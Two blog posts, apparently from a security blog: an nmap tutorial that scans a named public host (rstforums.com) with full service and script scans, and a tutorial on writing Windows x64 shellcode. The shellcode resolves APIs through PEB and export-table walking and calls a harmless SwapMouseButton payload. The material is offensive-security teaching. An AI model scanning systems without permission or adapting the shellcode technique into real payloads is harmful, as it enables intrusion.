To find vulnerabilities in a remote system, you should first find the network services running on the target server by doing a network scan and finding the open ports. A service, such as Apache or MySQL can open one or multiple ports on a server to provide its functionality, such as serving web pages or providing access to a database.

How?

A well-known tool that helps penetration testers to perform network scan is nmap (Network Mapper). Nmap is not just a port-scanner, it is a powerful tool, highly customizable that can also find the services running on a system or even use scrips (modules) to find vulnerabilities.

The easiest way to use nmap is to use the Pentest-Tools web interface which allows anyone to easily perform a network scan.

Let’s see some examples. We want to scan an IP address using nmap. How can we do it? What parameters should we use? We can start with the easiest version:

[email protected]:~# nmap 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-16 02:11 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.045s latency).
Not shown: 993 closed ports
PORT    STATE    SERVICE
22/tcp  open     ssh
25/tcp  filtered smtp
80/tcp  open     http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
443/tcp open     https
445/tcp filtered microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds

We can find some useful information:

  • We see the nmap version and start time of the scan
  • We can see the domain name of the IP address: rstforums.com
  • We can see that host is up, so nmap checked this
  • We can see that 993 ports are closed
  • We can see that 7 ports are open or filtered

However, even if the default scan can be very useful, it might not provide all the information we need to perform the penetration test on the remote server.

Nmap options

Checking the options of nmap is the best place to start. The “nmap -h” command will show us the command line parameters grouped in multiple categories: target specification, host discovery, scan techniques, port specification, version/service detection, OS scan, script scan, performance, firewall evasion and output. It is possible to easily find detailed information about all options by using the “man nmap” command.

Let’s see what common options might be useful, from each category.

  1. Target specification – Since we have a single IP address as a target, there is no need to load it from a file (-iL), we will specify it in the command line.
  2. Host discovery – These options are useful when there are a lot of target IP addresses and can help to reduce the scan time by checking if the target IP addresses are online. It does this by sending multiple different packets, but it can miss some of them. Since in our case there is a single target IP address, we can disable the host discovery by using the “-Pn” argument.
  3. Scan techniques – It is possible to scan using multiple techniques. First, it is important to know what to scan for: TCP, UDP or both. The most common services are running on TCP, but in a penetration test UDP ports must not be forgotten. It is possible to scan for UDP ports using “-sU” command line option and for TCP, there are two common scan techniques: SYN scan (“-sS” option) and Connect scan (“-sT” option).
  4. Port specification – After we decide what scan technique to use, we have to mention the ports we want to scan. This can be easily achieved with “-p” option. By default, nmap scans the most common 1000 ports. However, to be sure, we can scan all ports (1-15535) using “-p-“ option.
  5. Service/version detection – Even if finding open ports is a good start, finding which service and which service version are running on the target system would help more. This can be easily achieved by using the “-sV” option.
  6. OS detection – It might be useful to also know which Operating System is running on the target system and specifying the “-O” option will instruct nmap to try to find it out.
  7. Script scan – With the previous options we can find which services are running on the target system. However, why not to get more information about them? Nmap has a large amount of scripts that can get additional information about them. Please note that some of them might be “intrusive”, so we need the permission before scanning a target.
  8. Performance – This category allows us to customize the speed of the scan. There are a few timing templates that can be used with “-T” parameter, from “-T0” (paranoid mode) to “-T5” (insane mode). A recommended value would be “-T3” (normal mode) and if network connectivity is good, “-T4” (aggressive mode) can be used as well.
  9. Firewall evasion – There are multiple options which specify different techniques that can be used to avoid firewalls, however, for the simplicity we will not use them here.
  10. Output – What happens if you scan for a long time and your system crashes? What if you close the Terminal by mistake and not check the scan result? You should always save the output of the scan result! The “-oN” saves the normal output, “-oX” saves the output as XML or “-oG” saves it in “greppable” format.
  11. Other options – It is also very useful to know what’s happening if a long-time scan is running an “-v” can improve verbosity and keep you up to date. If there are a lot of targets, by using “–open” you will only get the open ports as output and it can improve your scan read time. It is possible to also resume a scanning session (if output was saved) using “–resume” option and “-A” (aggressive) can turn on multiple scan options by default: “-O -sC -sV” but not “-T4”.

During a penetration test all ports must be scanned. A possible nmap command to do it would be the following:

nmap -sS -sU -p- -sC -sV -O -Pn -v -oN output 137.74.202.89

However, it will take some time, so a good suggestion is to run a shorter scan first, scan for example only most common 100 or 1000 TCP ports and after this scan is finished, start the full scan while working with the result of this scan. Below is an example, where “–top-ports” option choses the most common 1000 ports.

nmap -sS --top-ports 1000 -sC -sV -v -Pn -oN output 137.74.202.89

TCP vs UDP scan

While doing a network scan, it is useful to understand the differences between TCP and UDP protocols.

UDP protocol is very simple, but it does not offer the functionalities that TCP offers. The most useful features of TCP are the following:

  • It requires an initial connection, in 3 steps, also called “3-way handshake”:
  1. Client sends a packet with the SYN flag (a bit in the TCP header) set
  2. Server replies with the SYN and ACK flags set (as mentioned in the TCP standard, this can also be done in two packets, but it’s easier to combine them in a single packet)
  3. Client confirms using an ACK flag set packet.
  • Each packet sent to a target is confirmed by another packet, so it is possible to know if the packed reached the destination or not
  • Each packet has a number, so it is sure that the packets are processed at the destination in the same order as they were sent

The initial connection is important to be understood in order to understand the difference between the two common TCP scans: SYN scan (-sS) vs Connect (-sT) scan. The difference is that the SYN scan is faster, as nmap will not send the last ACK packet. Also, it is important to note that nmap requires root privileges to use SYN scan. This is because nmap need to use RAW sockets, a functionality of the Operating system, to be able to manually create the TCP packets and this needs root privileges. If we run nmap with root privileges, by default it will use SYN scan, if not, It will use Connect scan.

How does it work?

Enough with the theory, let’s see what happens during a SYN and UDP scan. We will use a simple command, to scan for port 80 on both TCP (using SYN scan) and UDP.

# nmap -sS -sU -Pn -p 80 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-17 13:12 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.045s latency).
PORT   STATE  SERVICE
80/tcp open   http
80/udp closed http
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

During the scan, we open Wireshark and check for the packets sent using a filter that will show us only the packets sent to our target IP address: “ip.addr == 137.74.202.89”. Below is the result:

syn

We can see the following:

  1. First three packets are TCP: one with the SYN flag sent by nmap, one with the SYN and ACK flags sent by the target server and one with RST (Reset) flag sent by nmap. As you can see, being a SYN scan, the last packet of the three-way handshake does not exist. This is helpful, because some services, on connection, might log the IP address that connected to them and this type of scan helps us to avoid this issue.
  2. Last two packets are UDP and ICMP: first packet is the one sent by nmap to the remote port 80, and it received an ICMP message “Destination unreachable (Port unreachable)” which informs us that the port is not open and nmap can show it as closed. However, please note that those packets might not be sent.

Let’s also check for a Connect scan is performed. We can use the following command:

nmap -sT -Pn -p 80 137.74.202.89

Below is the result:

open

We can see that there are four packets:

  1. First three packets represent the three-way handshake used to initiate the connection.
  2. Last packet is sent to close the connection

What happens if the port is closed? We will change the port to a random one: 1337

closed

There are two packets:

  1. First packet is the SYN packet sent by nmap to initiate the connection
  2. Second packet is the RST packet received, meaning that the port is not opened

However, if a firewall is used, it might be possible to not receive the RST packet.

Service version

Service version option (-sV) allows us to find out what is running on the target port. This depends on the service running there. However, let’s see some examples of requests that nmap will use to find what is running on port 80, which is an Apache web server.

# nmap -sS -Pn -p 80 -sV 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-17 14:05 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.043s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.98 seconds

Below is a list of HTTP requests sent by nmap:

GET / HTTP/1.0
GET /nmaplowercheck1539799522 HTTP/1.1
Host: rstforums.com
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
POST /sdk HTTP/1.1
Host: rstforums.com
Content-Length: 441
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
GET /HNAP1 HTTP/1.1
Host: rstforums.com
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
GET / HTTP/1.1
Host: rstforums.com
GET /evox/about HTTP/1.1
Host: rstforums.com
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

Script scan

If we enable the script scan (-sC), the number of requests increases as it will use multiple “scripts” to find more information about the target. Let’s take the following example:

# nmap -sS -Pn -p 80 -sC 137.74.202.89
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-17 14:14 EDT
Nmap scan report for rstforums.com (137.74.202.89)
Host is up (0.045s latency).
PORT   STATE SERVICE
80/tcp open  http
|_http-title: Did not follow redirect to https://rstforums.com/
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds

Below is the Wireshark output, using a filter that matches only the HTTP requests sent:

http wireshark

As you can see, nmap scripts will send several HTTP requests useful to find more information about the application running on the web server. For example, it will send a request to find if “.git” directory is present, which can contain source code, it sends a request to get “robots.txt” file which might lead to additional paths and one script even sends a POST request to find if there is a RPC (Remote Procedure Call) aware service running:

POST / HTTP/1.1
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Host: rstforums.com

<methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>

Conclusion

Nmap is most often seen as a “port scanner”. However, in the right hands, in the hands of someone that properly understands how it works, it turns into a powerful penetration testing tool.

This article highlights some of the most common and useful features of nmap, but for a comprehensive understanding of the tool it is required to read the manual and actually use it.

nytrosecurity

💾

syn

💾

open

💾

closed

💾

http wireshark

💾

Writing shellcodes for Windows x64

30 June 2019 at 16:01

Long time ago I wrote three detailed blog posts about how to write shellcodes for Windows (x86 – 32 bits). The articles are beginner friendly and contain a lot of details. First part explains what is a shellcode and which are its limitations, second part explains PEB (Process Environment Block), PE (Portable Executable) file format and the basics of ASM (Assembler) and the third part shows how a Windows shellcode can be actually implemented.

This blog post is the port of the previous articles on Windows 64 bits (x64) and it will not cover all the details explained in the previous blog posts, so who is not familiar with all the concepts of shellcode development on Windows must see them before going further.

Of course, the differences between x86 and x64 shellcode development on Windows, including ASM, will be covered here. However, since I already write some details about Windows 64 bits on the Stack Based Buffer Overflows on x64 (Windows) blog post, I will just copy and paste them here.

As in the previous blog posts, we will create a simple shellcode that swaps the mouse buttons using SwapMouseButton function exported by user32.dll and grecefully close the proccess using ExitProcess function exported by kernel32.dll.

ASM for x64

There are multiple differences in Assembly that need to be understood in order to proceed. Here we will talk about the most important changes between x86 and x64 related to what we are going to do.

Please note that this article is for educational purposes only. It has to be simple, meaning that, of course, there are a lot of optimizations that can be done for the resulted shellcode to be smaller and faster.

First of all, the registers are now the following:

  • The general purpose registers are the following: RAX, RBX, RCX, RDX, RSI, RDI, RBP and RSP. They are now 64 bit (8 bytes) instead of 32 bits (4 bytes).
  • The EAX, EBX, ECX, EDX, ESI, EDI, EBP, ESP represent the last 4 bytes of the previously mentioned registers. They hold 32 bits of data.
  • There are a few new registers: R8, R9, R10, R11, R12, R13, R14, R15, also holding 64 bits.
  • It is possible to use R8d, R9d etc. in order to access the last 4 bytes, as you can do it with EAX, EBX etc.
  • Pushing and poping data on the stack will use 64 bits instead of 32 bits

Calling convention

Another important difference is the way functions are called, the calling convention.

Here are the most important things we need to know:

  • First 4 parameters are not placed on the stack. First 4 parameters are specified in the RCX, RDX, R8 and R9 registers.
  • If there are more than 4 parameters, the other parameters are placed on the stack, from left to right.
  • Similar to x86, the return value will be available in the RAX register.
  • The function caller will allocate stack space for the arguments used in registers (called “shadow space” or “home space”). Even if when a function is called the parameters are placed in registers, if the called function needs to modify the registers, it will need some space to store them, and this space will be the stack. The function caller will have to allocate this space before the function call and to deallocate it after the function call. The function caller should allocate at least 32 bytes (for the 4 registers), even if they are not all used.
  • The stack has to be 16 bytes aligned before any call instruction. Some functions might allocate 40 (0x28) bytes on the stack (32 bytes for the 4 registers and 8 bytes to align the stack from previous usage – the return RIP address pushed on the stack) for this purpose. You can find more details here.
  • Some registers are volatile and other are nonvolatile. This means that if we set some values into a register and call some function (e.g. Windows API) the volatile register will probably change while nonvolatile register will preserve their values.

More details about calling convention on Windows can be found here.

Function calling example

Let’s take a simple example in order to understand those things. Below is a function that does a simple addition, and it is called from main.

#include "stdafx.h"

int Add(long x, int y)
{
    int z = x + y;
    return z;
}

int main()
{
    Add(3, 4);
    return 0;
}

Here is a possible output, after removing all optimizations and security features.

Main function:

sub rsp,28
mov edx,4
mov ecx,3
call <consolex64.Add>
xor eax,eax
add rsp,28
ret

We can see the following:

  1. sub rsp,28 – This will allocate 0x28 (40) bytes on the stack, as we discussed: 32 bytes for the register arguments and 8 bytes for alignment.
  2. mov edx,4 – This will place in EDX register the second parameter. Since the number is small, there is no need to use RDX, the result is the same.
  3. mov ecx,3 – The value of the first argument is place in ECX register.
  4. call <consolex64.Add> – Call the “Add” function.
  5. xor eax,eax – Set EAX (or RAX) to 0, as it will be the return value of main.
  6. add rsp,28 – Clears the allocated stack space.
  7. ret – Return from main.

Add function:

mov dword ptr ss:[rsp+10],edx
mov dword ptr ss:[rsp+8],ecx
sub rsp,18
mov eax,dword ptr ss:[rsp+28]
mov ecx,dword ptr ss:[rsp+20]
add ecx,eax
mov eax,ecx
mov dword ptr ss:[rsp],eax
mov eax,dword ptr ss:[rsp]
add rsp,18
ret

Let’s see how this function works:

  1. mov dword ptr ss:[rsp+10],edx – As we know, the arguments are passed in ECX and EDX registers. But what if the function needs to use those registers (however, please note that some registers must be preserved by a function call, these registers are the following: RBX, RBP, RDI, RSI, R12, R13, R14 and R15)? In this case, the function will use the “shadow space” (“home space”) allocated by the function caller. With this instruction, the function saves on the shadow space the second argument (the value 4), from EDX register.
  2. mov dword ptr ss:[rsp+8],ecx – Similar to the previous instruction, this one will save on the stack the first argument (value 3) from the ECX register
  3. sub rsp,18 – Allocate 0x18 (or 24) bytes on the stack. This function does not call other function, so it is not needed to allocate at least 32 bytes. Also, since it does not call other functions, it is not required to align the stack to 16 bytes. I am not sure why it allocates 24 bytes, it looks like the “local variables area” on the stack has to be aligned to 16 bytes and the other 8 bytes might be used for the stack alignment (as previously mentioned).
  4. mov eax,dword ptr ss:[rsp+28] – Will place in EAX register the value of the second parameter (value 4).
  5. mov ecx,dword ptr ss:[rsp+20] – Will place in ECX register the value of the first parameter (value 3).
  6. add ecx,eax – Will add to ECX the value of the EAX register, so ECX will become 7.
  7. mov eax,ecx – Will save the same value (the sum) into EAX register.
  8. mov dword ptr ss:[rsp],eax and mov eax,dword ptr ss:[rsp] look like they are some effects of the removed optimizations, they don’t do anything useful.
  9. add rsp,18 – Cleanup the allocated stack space.
  10. ret – Return from the function

Writing ASM on Windows x64

There are multiple ways to write assembler on Windows x64. I will use NASM and the linker provided by Microsoft Visual Studio Community.

I will use the x64.asm file to write the assembler code, the NASM will output x64.obj and the linker will create x64.exe. To keep this process simple, I created a simple Windows Batch script:

del x64.obj
del x64.exe
nasm -f win64 x64.asm -o x64.obj
link /ENTRY:main /MACHINE:X64 /NODEFAULTLIB /SUBSYSTEM:CONSOLE x64.obj

You can run it using “x64 Native Tools Command Prompt for VS 2019” where “link” is available directly. Just not forget to add NASM binaries directory to the PATH environment variable.

To test the shellcode I open the resulted binary in x64bdg and go through the code step by step. This way, we can be sure everything is OK.

Before starting with the actual shellcode, we can start with the following:

BITS 64
SECTION .text
global main
main:

sub   RSP, 0x28                 ; 40 bytes of shadow space
and   RSP, 0FFFFFFFFFFFFFFF0h   ; Align the stack to a multiple of 16 bytes

This will specify a 64 bit code, with a “main” function in the “.text” (code) section. The code will also allocate some stack space and align the stack to a multiple of 16 bytes.

Find kernel32.dll base address

As we know, the first step in the shellcode development process for Windows is to find the base address of kernel32.dll, the memory address where it is loaded. This will help us to find its useful exported functions: GetProcAddress and LoadLibraryA which we can use to achive our goals.

We will start finding the TEB (Thread Environment Block), the structure that contains thread information in usermode and we can find it using GS register, ar gs:[0x00]. This structure also contains a pointer to the PEB (Process Envrionment Block) at offset 0x60.

The PEB contains the “Loader” (Ldr) at offset 0x18 which contains the “InMemoryOrder” list of modules at offset 0x20. As we did for x86, first module will be the executable, the second one ntdll.dll and the third one kernel32.dll which we want to find. This means we will go through a linked list (LIST_ENTRY structure which contains to LIST_ENTRY* pointers, Flink and Blink, 8 bytes each on x64).

After we find the third module, kernel32.dll, we just need to go to offset 0x20 to get its base address and we can start doing our stuff.

Below is how we can get the base address of kernel32.dll using PEB and store it in the RBX register:

; Parse PEB and find kernel32

xor rcx, rcx             ; RCX = 0
mov rax, [gs:rcx + 0x60] ; RAX = PEB
mov rax, [rax + 0x18]    ; RAX = PEB->Ldr
mov rsi, [rax + 0x20]    ; RSI = PEB->Ldr.InMemOrder
lodsq                    ; RAX = Second module
xchg rax, rsi            ; RAX = RSI, RSI = RAX
lodsq                    ; RAX = Third(kernel32)
mov rbx, [rax + 0x20]    ; RBX = Base address

Find the address of GetProcAddress function

It is really similar to find the address of GetProcAddress function, the only difference would be the offset of export table which is 0x88 instead of 0x78.

The steps are the same:

  1. Go to the PE header (offset 0x3c)
  2. Go to Export table (offset 0x88)
  3. Go to the names table (offset 0x20)
  4. Get the function name
  5. Check if it starts with “GetProcA”
  6. Go to the ordinals table (offset 0x24)
  7. Get function number
  8. Go to the address table (offset 0x1c)
  9. Get the function address

Below is the code that can help us find the address of GetProcAddress:

; Parse kernel32 PE

xor r8, r8                 ; Clear r8
mov r8d, [rbx + 0x3c]      ; R8D = DOS->e_lfanew offset
mov rdx, r8                ; RDX = DOS->e_lfanew
add rdx, rbx               ; RDX = PE Header
mov r8d, [rdx + 0x88]      ; R8D = Offset export table
add r8, rbx                ; R8 = Export table
xor rsi, rsi               ; Clear RSI
mov esi, [r8 + 0x20]       ; RSI = Offset namestable
add rsi, rbx               ; RSI = Names table
xor rcx, rcx               ; RCX = 0
mov r9, 0x41636f7250746547 ; GetProcA

; Loop through exported functions and find GetProcAddress

Get_Function:

inc rcx                    ; Increment the ordinal
xor rax, rax               ; RAX = 0
mov eax, [rsi + rcx * 4]   ; Get name offset
add rax, rbx               ; Get function name
cmp QWORD [rax], r9        ; GetProcA ?
jnz Get_Function
xor rsi, rsi               ; RSI = 0
mov esi, [r8 + 0x24]       ; ESI = Offset ordinals
add rsi, rbx               ; RSI = Ordinals table
mov cx, [rsi + rcx * 2]    ; Number of function
xor rsi, rsi               ; RSI = 0
mov esi, [r8 + 0x1c]       ; Offset address table
add rsi, rbx               ; ESI = Address table
xor rdx, rdx               ; RDX = 0
mov edx, [rsi + rcx * 4]   ; EDX = Pointer(offset)
add rdx, rbx               ; RDX = GetProcAddress
mov rdi, rdx               ; Save GetProcAddress in RDI

Please note that this has to be done carefully. Some structures from the PE file are not 8 bytes, while we need in the end 8 bytes pointers. This is why in the code above there are registers such as ESI or CX used.

Find the address of LoadLibraryA

Since we have the address of GetProcAddress and the base address of kernel32.dll, we can use them to call GetProcAddress(kernel32.dll, “LoadLibraryA”) and find the address of LoadLibraryA function.

However, it is something important we need to be careful about: we will use the stack to place our strings (e.g. “LoadLibraryA”) and this might break the stack alignment, so we need to make sure it is 16 bytes alligned. Also, we must not forget about the stack space that we need to allocate for a function call, because the function we call might use it. So, we need to place our string on the stack and just after this to allocate space for the function we call (e.g. GetProcAddress).

Finding the address of LoadLibraryA is pretty straightforward:

; Use GetProcAddress to find the address of LoadLibrary

mov rcx, 0x41797261          ; aryA
push rcx                     ; Push on the stack
mov rcx, 0x7262694c64616f4c  ; LoadLibr
push rcx                     ; Push on stack
mov rdx, rsp                 ; LoadLibraryA
mov rcx, rbx                 ; kernel32.dll base address
sub rsp, 0x30                ; Allocate stack space for function call
call rdi                     ; Call GetProcAddress
add rsp, 0x30                ; Cleanup allocated stack space
add rsp, 0x10                ; Clean space for LoadLibrary string
mov rsi, rax                 ; LoadLibrary saved in RSI

We put the “LoadLibraryA” string on the stack, setup RCX and RDX registers, allocate space on the stack for the function call, call GetProcAddress and cleanup the stack. As a result, we will store the LoadLibraryA address in the RSI register.

Load user32.dll using LoadLibraryA

Since we have the address of LoadLibraryA function, it is pretty simple to call LoadLibraryA(“user32.dll”) to load user32.dll and find out its base address which will be returned by LoadLibraryA.

mov rcx, 0x6c6c               ; ll
push rcx                      ; Push on the stack
mov rcx, 0x642e323372657375   ; user32.d
push rcx                      ; Push on stack
mov rcx, rsp                  ; user32.dll
sub rsp, 0x30                 ; Allocate stack space for function call
call rsi                      ; Call LoadLibraryA
add rsp, 0x30                 ; Cleanup allocated stack space
add rsp, 0x10                 ; Clean space for user32.dll string
mov r15, rax                  ; Base address of user32.dll in R15

The function will return the base address of the user32.dll module into RAX and we will save it in the R15 register.

Find the address of SwapMouseButton function

We have the address of GetProcAddress, the base address of user32.dll and we know the function is called “SwapMouseButton”. So we just need to call GetProcAddress(user32.dll, “SwapMouseButton”);

Please note that when we allocate space on stack for the function call, we do not allocate anymore 0x30 (48) bytes, we allocate only 0x28 (40) bytes. This is because to place our string (“SwapMouseButton”) on the stack we use 3 PUSH instructions, so we get 0x18 (24) bytes of data, which is not a multiple of 16. So we use 0x28 instead of 0x30 to align the stack to 16 bytes.

; Call GetProcAddress(user32.dll, "SwapMouseButton")

xor rcx, rcx                  ; RCX = 0
push rcx                      ; Push 0 on stack
mov rcx, 0x6e6f7474754265     ; eButton
push rcx                      ; Push on the stack
mov rcx, 0x73756f4d70617753   ; SwapMous
push rcx                      ; Push on stack
mov rdx, rsp                  ; SwapMouseButton
mov rcx, r15                  ; User32.dll base address
sub rsp, 0x28                 ; Allocate stack space for function call
call rdi                      ; Call GetProcAddress
add rsp, 0x28                 ; Cleanup allocated stack space
add rsp, 0x18                 ; Clean space for SwapMouseButton string
mov r15, rax                  ; SwapMouseButton in R15

GetProcAddress will return in RAX the address of SwapMouseButton function and we will save it into R15 register.

Call SwapMouseButton

Well, we have its address, it should be pretty easy to call it. We do not have any issue as we previously cleaned up and we do not need to alter the stack in this function call. So we just set the RCX register to 1 (meaning true) and call it.

; Call SwapMouseButton(true)

mov rcx, 1    ; true
call r15      ; SwapMouseButton(true)

Find the address of ExitProcess function

As we already did before, we use GetProcAddress to find the address of ExitProcess function exported by the kernel32.dll. We still have the kernel32.dll base address in RBX (which is a nonvolatile register and this is why it is used) so it is simple:

; Call GetProcAddress(kernel32.dll, "ExitProcess")

xor rcx, rcx                 ; RCX = 0
mov rcx, 0x737365            ; ess
push rcx                     ; Push on the stack
mov rcx, 0x636f725074697845  ; ExitProc
push rcx                     ; Push on stack
mov rdx, rsp                 ; ExitProcess
mov rcx, rbx                 ; Kernel32.dll base address
sub rsp, 0x30                ; Allocate stack space for function call
call rdi                     ; Call GetProcAddress
add rsp, 0x30                ; Cleanup allocated stack space
add rsp, 0x10                ; Clean space for ExitProcess string
mov r15, rax                 ; ExitProcess in R15

We save the address of ExitProcess function in R15 register.

ExitProcess

Since we do not want to let the process to crash, we can “gracefully” exit by calling the ExitProcess function. We have the address, the stack is aligned, we have just to call it.

; Call ExitProcess(0)

mov rcx, 0     ; Exit code 0
call r15       ; ExitProcess(0)

Conclusion

There are many articles about Windows shellcode development on x64, such as this one or this one, but I just wanted to tell the story my way, following the previously written articles.

The shellcode is far away from being optimized and it also contains NULL bytes. However, both of these limitations can be improved.

Shellcode development is fun and swithing from x86 to x64 is needed, because x86 will not be used too much in the future.

Or course, I will add support for Windows x64 in Shellcode Compiler.

If you have any question, please add a comment or contact me.

nytrosecurity

💾

❌